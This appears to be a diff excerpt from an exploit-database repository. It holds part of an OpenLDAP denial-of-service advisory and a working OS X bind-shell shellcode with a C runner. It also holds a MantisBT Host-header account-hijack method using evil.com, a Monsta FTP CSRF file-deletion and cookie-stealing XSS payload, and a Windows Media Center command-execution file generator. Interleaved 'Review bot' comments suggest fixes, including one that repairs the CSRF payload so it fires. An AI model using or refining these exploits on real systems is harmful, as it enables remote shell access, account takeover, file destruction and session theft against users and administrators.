line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
|
||||
#3 0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682,
|
||||
function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
|
||||
#4 0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682
|
||||
#5 0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572
|
||||
#6 connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460
|
||||
#7 connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
|
||||
#8 0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
|
||||
#9 0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309
|
||||
#10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
|
||||
|
||||
+----------+
|
||||
| Solution |
|
||||
+----------+
|
||||
This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in
|
||||
git://git.openldap.org/openldap.git
|
||||
|
||||
+----------+
|
||||
| Timeline |
|
||||
+----------+
|
||||
|
||||
10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a ‘minor’ security issue, as per the requirements in
|
||||
the ITS, making the issue public.
|
||||
10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
|
||||
10/09/15 - Release of this advisory document.
|
||||
|
||||
+-------------------------------+
|
||||
| About Security-Assessment.com |
|
||||
+-------------------------------+
|
||||
|
||||
Security-Assessment.com is Australasia's leading team of Information Security
|
||||
consultants specialising in providing high quality Information Security
|
||||
services to clients throughout the Asia Pacific region. Our clients include
|
||||
some of the largest globally recognised companies in areas such as finance,
|
||||
telecommunications, broadcasting, legal and government. Our aim is to provide
|
||||
the very best independent advice and a high level of technical expertise while
|
||||
creating long and lasting professional relationships with our clients.
|
||||
|
||||
Security-Assessment.com is committed to security research and development,
|
||||
and its team continues to identify and responsibly publish vulnerabilities
|
||||
in public and private software vendor's products. Members of the
|
||||
Security-Assessment.com R&D team are globally recognised through their release
|
||||
of whitepapers and presentations related to new security research.
|
||||
|
||||
For further information on this issue or any of our service offerings,
|
||||
contact us:
|
||||
|
||||
Web www.security-assessment.com
|
||||
Email info () security-assessment com
|
||||
Phone +64 4 470 1650
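Review bot: The advisory never states that the abort is reachable without authentication, yet the PoC under `--[ Exploit POC` pipes raw bytes to port 389 with no bind request and the back trace goes straight from connection_read/connection_input into ber_get_next, so this is an unauthenticated remote DoS against any slapd that accepts the TCP connection; the Description section should say so explicitly, e.g. `No LDAP bind or credentials are required; any client that can reach the listener can trigger the abort.` The Solution section cites only a master-branch commit and the Timeline shows the patch landing the day before disclosure, so readers should be told that no tagged release contained the fix at publication and that the fixed version has to be checked against the OpenLDAP ITS. Two name slips will defeat searches: `OpenLDAP get_ber_next Denial of Service` in the banner should read `ber_get_next`, and `--[ sladp -d3` should read `slapd -d3`. Because the crash is an assert(), builds compiled with NDEBUG presumably skip this particular abort, but whether they then handle the malformed BER length safely is not established here and should be stated as an open question rather than a mitigation.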
|
||||
|
122
platforms/osx/shellcode/38126.c
Executable file
122
platforms/osx/shellcode/38126.c
Executable file
|
@ -0,0 +1,122 @@
|
|||
;OS X x64, TCP bind shellcode (port 4444), NULL byte free, 144 bytes long
|
||||
;ASM code
|
||||
;compile:
|
||||
;nasm -f macho64 bind-shellcode.asm
|
||||
;ld -macosx_version_min 10.7.0 -o bindsc bind-shellcode.o
|
||||
|
||||
BITS 64
|
||||
|
||||
global start
|
||||
|
||||
section .text
|
||||
|
||||
;Argument order: rdi, rsi, rdx, rcx
|
||||
|
||||
|
||||
start:
|
||||
;socket
|
||||
xor rdi,rdi ;zero out RSI
|
||||
mov dil, 0x2 ;AF_INET = 2
|
||||
xor rsi,rsi ;zero out RSI
|
||||
mov sil, 0x1 ;SOCK_STREAM = 1
|
||||
xor rdx, rdx ;protocol = IP = 0
|
||||
|
||||
;store syscall number on RAX
|
||||
xor rax,rax ;zero out RAX
|
||||
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002
|
||||
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000
|
||||
mov al,0x61 ;move 3b to AL (execve socket#) -> RAX = 0x0000000002000061
|
||||
mov r12, rax ;save RAX
|
||||
syscall ;trigger syscall
|
||||
|
||||
;bind
|
||||
mov r9, rax ;save socket number
|
||||
mov rdi, rax ;put return value to RDI int socket
|
||||
xor rsi, rsi ;zero out RSI
|
||||
push rsi ;push RSI to the stack
|
||||
mov esi, 0x5c110201 ;port number 4444 (=0x115c)
|
||||
sub esi,1 ;make ESI=0x5c110200
|
||||
push rsi ;push RSI to the stack
|
||||
mov rsi, rsp ;store address
|
||||
mov dl,0x10 ;length of socket structure 0x10
|
||||
add r12b, 0x7 ;RAX = 0x0000000002000068 bind
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;listen
|
||||
;RDI already contains the socket number
|
||||
xor rsi, rsi ;zero out RSI
|
||||
inc rsi ;backlog = 1
|
||||
add r12b, 0x2 ;RAX = 0x000000000200006a listen
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;accept 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); }
|
||||
;RDI already contains the socket number
|
||||
xor rsi, rsi ;zero out RSI
|
||||
;RDX is already zero
|
||||
sub r12b, 0x4c ;RAX = 0x000000000200001e accept
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
;int dup2(u_int from, u_int to);
|
||||
mov rdi, rax
|
||||
xor rsi, rsi
|
||||
add r12b, 0x3c ;RAX = 0x000000000200005a dup2
|
||||
mov rax, r12 ;restore RAX
|
||||
syscall
|
||||
|
||||
/*
|
||||
$ nasm -f bin bind-shellcode.asm
|
||||
$ hexdump bind-shellcode
|
||||
0000000 48 31 ff 40 b7 02 48 31 f6 40 b6 01 48 31 d2 48
|
||||
0000010 31 c0 b0 02 48 c1 c8 28 b0 61 49 89 c4 0f 05 49
|
||||
0000020 89 c1 48 89 c7 48 31 f6 56 be 01 02 11 5c 83 ee
|
||||
0000030 01 56 48 89 e6 b2 10 41 80 c4 07 4c 89 e0 0f 05
|
||||
0000040 48 31 f6 48 ff c6 41 80 c4 02 4c 89 e0 0f 05 48
|
||||
0000050 31 f6 41 80 ec 4c 4c 89 e0 0f 05 48 89 c7 48 31
|
||||
0000060 f6 41 80 c4 3c 4c 89 e0 0f 05 48 ff c6 4c 89 e0
|
||||
0000070 0f 05 48 31 f6 56 48 bf 2f 2f 62 69 6e 2f 73 68
|
||||
0000080 57 48 89 e7 48 31 d2 41 80 ec 1f 4c 89 e0 0f 05
|
||||
0000090
|
||||
*/
|
||||
|
||||
//C code
|
||||
//compile:
|
||||
//gcc bind-shellcode.c -o bindsc
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/mman.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
int (*sc)();
|
||||
|
||||
char shellcode[] =
|
||||
"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" \
|
||||
"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" \
|
||||
"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02\x11\x5c\x83\xee" \
|
||||
"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" \
|
||||
"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" \
|
||||
"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" \
|
||||
"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" \
|
||||
"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" \
|
||||
"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05";
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
|
||||
void *ptr = mmap(0, 0x90, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
|
||||
| MAP_PRIVATE, -1, 0);
|
||||
|
||||
if (ptr == MAP_FAILED) {
|
||||
perror("mmap");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
memcpy(ptr, shellcode, sizeof(shellcode));
|
||||
sc = ptr;
|
||||
|
||||
sc();
|
||||
|
||||
return 0;
|
||||
}
|
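--- /dev/null
+++ b/platforms/php/webapps/38068.txt
@@ -0,0 +1,86 @@
+# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
+# Date: 07-09-2015
+# Exploit Author: Pier-Luc Maltais
+Centre opérationnel de sécurité informatique gouvernemental (COSIG)
+# Vendor Homepage: https://www.mantisbt.org/
+# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
+# Version: 1.2.19
+# Contact: https://twitter.com/plmaltais
+http://plmsecurity.net/mantis_host_header_attack
+
+==========================
+Vulnerability Description:
+==========================
+
+MantisBT 1.2.19 is vulnerable to an Host header attack that can
+be exploited by an unauthenticated user to hijack another user account.
+
+==================
+Technical Details:
+==================
+
+This exploit use the Host header attack to poison the link in the
+password reset mail. You need to know the victim username and
+e-mail. You also need a remote host that you control to catch the
+verification hash needed for password reset.
+
+1. Access the password reset feature and fill the form with the
+victim username and e-mail.
+
+http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php
+
+2. Using an intercepting proxy like Burp, change the Host header
+with your evil host.
+
+Original request :
+
+POST /mantisbt/lost_pwd_page.php HTTP/1.1
+Host : {VULNERABLE_MANTIS}
+[...]
+
+Modified request :
+
+POST /mantisbt/lost_pwd_page.php HTTP/1.1
+Host : evil.com
+[...]
+
+3. When the user receive the e-mail, the link is poisoned with
+the evil host.
+
+[...]
+visit the following URL to change your password:
+http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
+[...]
+
+4. Now, when the victim click on the link to reset his password,
+his verification hash will be sent to our evil host. All we
+have to do is access the verify.php page with his hash, so
+we can change his password and hijack his account.
+
+http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
+
+=========
+Solution:
+=========
+
+Use
+$_SERVER['SERVER_NAME'] (server controlled)
+instead of
+$_SERVER['HTTP_HOST'] (client controlled)
+
+====================
+Disclosure Timeline:
+====================
+
+16/02/2015 - Found the vulnerability
+17/02/2015 - Wrote this advisory
+17/02/2015 - Contacted developers on MantisBT forum
+18/02/2015 - Opened an issue in the bug tracker
+01/09/2015 - Still not patched, releasing this advisory.
+
+===========
+References:
+===========
+
+[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
+[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421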
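Review bot: The remedy in the Solution section is not reliable as stated: `$_SERVER['SERVER_NAME']` is only "server controlled" when the web server is configured with a canonical host name (on Apache, `UseCanonicalName On` together with an explicit `ServerName`); under the common default `UseCanonicalName Off` it is derived from the client's Host header, so the same poisoning of the reset link still works. The advisory should instead recommend building the password-reset URL from an explicitly configured, administrator-set base URL rather than from any request-derived value. Suggested replacement for the four Solution lines: `Build the reset URL from a fixed, administrator-configured base URL. Do not derive it from the request: $_SERVER['HTTP_HOST'] is client controlled, and $_SERVER['SERVER_NAME'] is too unless the web server is configured with a canonical name (e.g. Apache UseCanonicalName On).`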
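--- /dev/null
+++ b/platforms/php/webapps/38148.txt
@@ -0,0 +1,139 @@
+# Exploit Title: CSRF XSS Monsta FTP
+# Google Dork: intitle: Monsta FTP CSRF / XSS
+# Date: 2015-09-11
+# Exploit Author: hyp3rlinx
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: www.monstaftp.com
+# Software Link: www.monstaftp.com
+# Version: monsta_ftp_v1.6.2
+# Tested on: windows 7 SP1 XAMPP
+# Category: WebApps
+
+
+Vendor:
+================================
+www.monstaftp.com
+
+
+
+Product:
+================================
+monsta_ftp_v1.6.2
+Monsta FTP is open source PHP/Ajax cloudware browser based
+FTP file management web application.
+
+
+Vulnerability Type:
+===================
+CSRF / XSS
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+
+Vulnerability Details:
+=====================
+
+CSRF:
+-----
+No CSRF token exists when making some POST requests, allowing arbitrary
+deletion of files on the monstaftp server dirs.
+
+
+XSS:
+----
+
+Monstaftp sanitizes most $_GET requests with call to sanitizeStr() e.g -->
+echo sanitizeStr($ftp_host),
+However we find vulnerable code that is not santized on line 494 of
+index.php ---> echo $_GET["openFolder"];
+creating an XSS entry point and will execute when victim accesses the
+Monstaftp login page before logging in.
+
+
+
+Exploit code(s):
+===============
+
+1) CSRF delete all server files
+
+<body onLoad="doit()">
+
+<script>
+function doit(){
+var e=document.getElementById('HELL')
+e.submit()
+}
+
+<form id="HELL" action="http://localhost/monsta_ftp_v1.6.2_install/?"
+method="post">
+<input type="text" id="ftpAction" name="ftpAction" value="delete"/>
+<input type="text" id="folderAction[]" name="folderAction[]" value=""/>
+<input type="text" id="fileAction[]" name="fileAction[]"
+value="~%2FSOMEFILES_TO_DELETE.php"/>
+</form>
+
+
+
+2) XSS steal PHP session ID: e.g. "PHPSESSID=7lukgqaghuqihnbj3ikcrsc715"
+
+Logout, then access the following URL before login and BOOOOOOM!.
+http://localhost/monsta_ftp_v1.6.2_install/?openFolder="/><script>alert('XSS
+by hyp3rlinx '%2bdocument.cookie)</script>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: NA
+Sept 11, 2015 : Public Disclosure
+
+
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+
+Severity Level:
+=========================================================
+Med
+
+
+
+Description:
+==========================================================
+
+
+Request Method(s): [+] POST & GET
+
+
+Vulnerable Product: [+] monsta_ftp_v1.6.2
+
+
+Vulnerable Parameter(s): [+] ftpAction, fileAction[], openFolder
+
+
+Affected Area(s): [+] FTP Admin Area
+
+
+===========================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and that due
+credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit is given to
+the author.
+The author is not responsible for any misuse of the information contained
+herein and prohibits any malicious use of all security related information
+or exploits by the author or elsewhere.
+
+by hyp3rlinx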
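Review bot: The CSRF proof of concept in section 1) never closes its `<script>` element: after the `}` that ends `doit()` the `<form id="HELL" ...>` markup follows directly, so an HTML parser treats the whole form as script text, the script fails to parse and `doit` is undefined when `onLoad` fires. Insert `</script>` between the closing `}` and the `<form` line so the form is actually in the DOM and the submit runs. The advisory would also benefit from stating the preconditions it presumably relies on: the victim must have an active Monsta FTP session in the same browser for the `delete` action to reach a live FTP connection, and the session-theft claim in 2) only holds if PHPSESSID is issued without the HttpOnly flag, which the text does not confirm.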
39
platforms/windows/local/38147.pl
Executable file
File diff suppressed because one or more lines are too long
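--- /dev/null
+++ b/platforms/windows/remote/38151.py
@@ -0,0 +1,22 @@
+# Title: MS15-100 Windows Media Center Command Execution
+# Date : 11/09/2015
+# Author: R-73eN
+# Software: Windows Media Center
+# Tested : Windows 7 Ultimate
+# CVE : 2015-2509
+
+
+banner = ""
+banner += " ___ __ ____ _ _ \n"
+banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
+banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
+banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
+banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
+print banner
+
+command = "calc.exe"
+evil = '<application run="' + command + '"/>'
+f = open("Music.mcl","w")
+f.write(evil)
+f.close()
+print "\n[+] Music.mcl generated . . . [+]"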
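Review bot: The output file is opened without a context manager and the script uses Python 2 `print` statements, so it fails to parse under Python 3 and leaves the handle open if `write` raises; `with open("Music.mcl", "w") as f:` / `f.write(evil)` plus `print(banner)` and `print("\n[+] Music.mcl generated . . . [+]")` fixes both and runs on either interpreter. The `command` value is spliced into an XML attribute with plain concatenation, so any payload containing `"` or `&` yields a malformed `.mcl`; `evil = '<application run=%s/>' % xml.sax.saxutils.quoteattr(command)` builds the attribute safely. A short header comment stating that the generated `Music.mcl` must be opened in Windows Media Center on a host without the MS15-100 update would make the precondition explicit for readers.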